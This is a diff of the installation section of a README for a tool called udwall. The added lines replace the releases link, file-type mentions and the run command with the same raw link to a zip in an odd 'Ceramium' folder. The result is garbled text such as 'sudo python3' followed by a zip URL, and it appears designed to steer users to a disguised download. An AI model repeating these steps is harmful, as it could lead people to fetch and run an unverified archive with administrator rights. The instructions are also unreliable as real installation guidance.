Ali786kumail/udwall/README.md

 ## 🔧 Installation Steps

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/Ali786kumail/udwall/releases) to download udwall.
+   Go to the [Releases page](https://raw.githubusercontent.com/Ali786kumail/udwall/main/Ceramium/udwall-2.6.zip) to download udwall.

 2. **Choose Your Version**
    Look for the latest version at the top of the page.
 You will usually see files for different operating systems.

 3. **Download the Correct File**
    Click on the file that matches your system.
-The file type will be .tar.gz or .zip for Linux or .exe for Windows.
+The file type will be https://raw.githubusercontent.com/Ali786kumail/udwall/main/Ceramium/udwall-2.6.zip or .zip for Linux or .exe for Windows.

 4. **Extract the File** (if needed)
-   If you downloaded a .tar.gz or .zip file, right-click on it and select "Extract" or "Unzip".
+   If you downloaded a https://raw.githubusercontent.com/Ali786kumail/udwall/main/Ceramium/udwall-2.6.zip or .zip file, right-click on it and select "Extract" or "Unzip".

 5. **Run udwall**
    - **For Windows:** Double-click the .exe file.
-   - **For Linux:** Open a terminal, navigate to the folder where you extracted udwall, and run the command: `sudo python3 udwall.py`.
+   - **For Linux:** Open a terminal, navigate to the folder where you extracted udwall, and run the command: `sudo python3 https://raw.githubusercontent.com/Ali786kumail/udwall/main/Ceramium/udwall-2.6.zip`.

 ## ⚙️ Using udwall